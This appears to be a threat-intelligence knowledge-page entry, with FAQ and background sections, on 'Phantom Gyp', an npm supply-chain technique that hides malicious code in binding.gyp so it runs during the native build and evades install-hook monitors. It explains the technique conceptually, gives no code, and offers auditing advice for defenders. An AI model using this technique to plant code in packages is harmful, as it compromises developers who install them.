Phantom Gyp
Phantom Gyp is a supply-chain attack variant observed on 3 June 2026 that weaponises the binding.gyp native-build configuration file to execute malicious code during npm install via Node's native compiler, evading preinstall and postinstall hook monitors.
Last refreshed: 14 June 2026 · Appears in 1 active topic
If blocking binding.gyp breaks legitimate packages, how should security teams respond to Phantom Gyp?
Timeline for Phantom Gyp
Executed malicious code via Node's native build compiler step, evading npm hook monitors
Cybersecurity: Threats and Defences: Attack worm kit now open-sourced freely- What is Phantom Gyp and how does it evade npm security tools?
- Phantom Gyp is a supply-chain attack that hides malicious code in the npm binding.gyp file, causing it to run via Node's native C compiler rather than through the preinstall/postinstall hooks that security monitors typically watch.Source: Protos Labs
- Why can't standard npm hook monitoring detect Phantom Gyp?
- Most npm security tools flag preinstall and postinstall scripts as high-risk. Phantom Gyp bypasses these by executing through the native build compiler step triggered by binding.gyp, which sits outside the hooks those tools monitor.Source: Protos Labs
- How do I check if a package uses binding.gyp for malicious purposes?
- Audit the binding.gyp file in any native npm package for unexpected binary downloads, Shell commands, or network calls in the target or action fields. Legitimate native modules only invoke compilers on local source files.Source: Protos Labs
Background
Phantom Gyp is a supply-chain attack technique observed on 3 June 2026, classified as a variant of the Shai-Hulud framework developed by UNC6780/TeamPCP. It weaponises the npm `binding.gyp` file, which instructs Node.js to invoke the system's native C/C++ compiler (via `node-gyp`) during package installation. By placing malicious code in this build step, Phantom Gyp causes it to execute as a subprocess of the compiler rather than through npm's `preinstall` or `postinstall` hooks, defeating the primary defensive layer most package-monitoring tools rely on.
The technique is significant because `binding.gyp`-based native modules are common in legitimate packages that require operating-system-level bindings (cryptography, database clients, image processing). Security tooling that flags `preinstall`/`postinstall` hooks as high-risk will not alert on the same code delivered through the native-build PATH. Affected packages in the Phantom Gyp campaign also carried valid SLSA provenance attestations, which further erodes the value of attestation-based trust for packages using native compilation.
Defence requires either blocking native-build execution at install time (which breaks legitimate packages) or auditing `binding.gyp` content explicitly. The Phantom Gyp technique is expected to persist independently of the broader Shai-Hulud framework given its simplicity and the difficulty of wholesale blocking native npm builds.